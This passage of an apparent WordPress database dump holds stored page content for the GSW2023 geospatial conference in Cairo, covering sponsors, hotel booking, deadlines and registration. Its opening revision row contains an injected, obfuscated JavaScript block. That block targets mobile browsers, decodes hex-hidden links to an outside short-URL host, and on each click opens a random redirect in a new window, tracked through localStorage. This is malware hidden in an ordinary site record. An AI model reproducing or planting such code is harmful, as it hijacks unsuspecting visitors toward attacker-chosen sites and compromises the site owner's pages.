\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:07:00','2023-05-17 05:07:00','',3066,'https://gsw2023.com/?p=4522',0,'revision','',0),
(4523,1,'2023-05-17 05:15:53','2023-05-17 05:15:53','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"]\r\n<h3>[vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner]</h3>\r\n<h3>[vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" 